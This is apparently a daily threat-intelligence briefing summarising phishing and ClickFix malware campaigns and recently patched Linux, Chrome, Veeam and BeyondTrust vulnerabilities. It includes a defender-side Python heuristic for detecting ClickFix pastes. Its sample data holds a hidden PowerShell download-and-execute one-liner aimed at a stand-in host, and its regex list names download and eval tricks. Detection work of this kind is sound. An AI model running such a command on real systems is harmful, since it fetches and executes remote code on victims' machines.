Cyware Daily Threat Intelligence, June 18, 2025


Daily Threat Briefing June 18, 2025

An official-looking email from the tax department may be anything but. Silver Fox APT is targeting Taiwanese users with phishing emails posing as the National Taxation Bureau, delivering malware like Winos 4.0, HoldingHands RAT, and Gh0stCringe. The attack chain uses DLL side-loading, privilege escalation, and anti-analysis techniques to evade detection and maintain access through remote desktop and file management modules.

One compromised travel site is now a launchpad for infostealer infections. A new ClickFix variant, LightPerlGirl, is using fake Cloudflare CAPTCHA prompts and clipboard hijacking to deliver the Lumma infostealer. By exploiting PowerShell and personal device access, the malware could lead to broader breaches across enterprise environments.

A pair of Linux vulnerabilities could give attackers root in seconds. CVE-2025-6018 and CVE-2025-6019 impact multiple major Linux distributions, enabling local users to escalate privileges via flaws in PAM and libblockdev. If chained together, the bugs allow full system compromise with minimal friction, posing a serious risk if left unpatched.

Top Malware Reported in the Last 24 Hours

ClickFix campaign drops RATs and infostealer

A growing number of campaigns are using the ClickFix social engineering technique to deploy malware, particularly the GHOSTPULSE loader and the ARECHCLIENT2 infostealer. ClickFix manipulates users into executing malicious PowerShell commands by disguising them as benign prompts, often fake CAPTCHA verifications. The continuously updated GHOSTPULSE loader employs multi-stage payload delivery and DLL sideloading to improve evasion. ARECHCLIENT2, a .NET-based remote access trojan, targets sensitive information such as credentials and financial data. The attack chain begins with phishing pages that deliver obfuscated scripts, which then execute the malware. The campaign infrastructure relies on compromised servers, with C2 nodes changing frequently to evade detection.

Hackers target Taiwan, drop Winos 4.0

Silver Fox APT launched a phishing campaign targeting Taiwan, which impersonates the National Taxation Bureau to distribute malware, including Winos 4.0, HoldingHands RAT, and Gh0stCringe. Emails use topics like tax forms and invoices, embedding malicious links or files leading to malware downloads. The attack employs multi-stage side-loading methods with files like TaskServer.exe and Dokan2.dll, which decrypt and execute malicious payloads. The malware utilizes anti-virtualization techniques, privilege escalation, and evasion strategies against security tools like Kaspersky. HoldingHands RAT communicates with C2 servers, collecting system data and supporting remote operations through modules like Remote Desktop and File Manager.

Researchers identify new ClickFix variant

A new ClickFix malware variant, LightPerlGirl, was discovered exploiting PowerShell and clipboard hijacking to deliver the Lumma infostealer. The malware uses a compromised WordPress travel site in a watering hole attack, tricking users with fake Cloudflare CAPTCHA prompts. The attack process involves clipboard manipulation, obfuscated PowerShell commands, and connection to a C2 domain for malware delivery. The Lumma infostealer could lead to broader enterprise compromises by targeting individuals' personal devices.
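As an added example that is not from the briefing or from any vendor's tooling, here is a defender-side heuristic for the ClickFix pattern described in the two ClickFix items above (GHOSTPULSE/ARECHCLIENT2 and LightPerlGirl): it scores Windows process-creation events for the tell-tale Run-dialog paste, explorer.exe spawning PowerShell with a hidden window and a download-and-execute one-liner. The indicator list, scoring threshold and sample records are constructed assumptions, not campaign data from the briefing.

```python
# Heuristic ClickFix detection over process-creation telemetry (added example; sample data constructed).
import re
from typing import NamedTuple

# Interpreters a Run-dialog paste typically launches (assumption, not from the briefing).
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Each matching indicator adds one point; the threshold in detect_clickfix is an assumed tuning value.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_cmd": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
    "download": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod)\b", re.I),
    "eval": re.compile(r"\biex\b|invoke-expression", re.I),
    "lure_text": re.compile(r"captcha|i am not a robot|verification id", re.I),
}

class ProcEvent(NamedTuple):
    parent_image: str
    image: str
    command_line: str

def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, matched indicator names) for one process-creation event."""
    child = ev.image.rsplit("\\", 1)[-1].lower()
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    if child not in LOLBIN_CHILDREN:
        return 0, []
    hits = [name for name, rx in INDICATORS.items() if rx.search(ev.command_line)]
    # A Win+R Run-dialog launch is parented by explorer.exe; weight that context extra.
    if parent == "explorer.exe" and hits:
        hits.append("explorer_parent")
        return len(hits) + 1, hits
    return len(hits), hits

def detect_clickfix(events, threshold: int = 4) -> list[dict]:
    """Return one finding per event whose score reaches the threshold."""
    findings = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            findings.append({"image": ev.image, "score": score, "indicators": hits})
    return findings

# Constructed sample telemetry: one ClickFix-style paste followed by two benign launches.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/x)" # "I am not a robot - Verification ID: 7391"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
    ProcEvent(r"C:\Program Files\VSCode\Code.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoLogo -File build.ps1"),
]
```

The explorer.exe parent alone is not suspicious (users launch PowerShell legitimately); the combination with a hidden window, a remote fetch and an inline `iex` is what separates the paste lure from normal use.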

Top Vulnerabilities Reported in the Last 24 Hours

Google released Chrome 137

Google's Chrome 137 update addresses three vulnerabilities, including two high-severity memory bugs: CVE-2025-6191, an integer overflow in the V8 JavaScript engine, and CVE-2025-6192, a use-after-free flaw in the Profiler component. The patches are available for Windows, macOS, and Linux. Memory vulnerabilities are appealing targets for attackers, and recent incidents have seen such flaws exploited as zero-days. Notably, CVE-2025-2783, a sandbox escape vulnerability, was exploited in cyberespionage campaigns against Russian organizations, linked to a group called Team46, which employs sophisticated malware and zero-day exploits.

Two LPE bugs in Linux distributions

Two local privilege escalation (LPE) vulnerabilities (CVE-2025-6018 and CVE-2025-6019) allow attackers to gain root access on major Linux distributions like Ubuntu, Debian, Fedora, and SUSE systems. CVE-2025-6018 involves a flaw in the PAM framework configuration on SUSE systems, enabling attackers to escalate privileges to "allow_active" users. CVE-2025-6019 is a vulnerability in libblockdev that allows "allow_active" users to gain root permissions via the udisks daemon, which is present by default on most Linux distributions. These vulnerabilities can be chained for quick root access and complete system takeover with minimal effort. Root access from these flaws could lead to agent tampering, persistence, and lateral movement, endangering entire networks if unpatched.

Veeam and BeyondTrust patch multiple bugs

Veeam and BeyondTrust released patches for vulnerabilities that could enable remote code execution. BeyondTrust addressed a server-side template injection flaw (CVE-2025-5309) in RS and PRA products, impacting specific versions. Veeam patched critical and high-severity vulnerabilities in its Backup & Replication software, including CVE-2025-23121 and CVE-2025-24286. A medium-severity vulnerability in Veeam Agent for Microsoft Windows was also fixed.
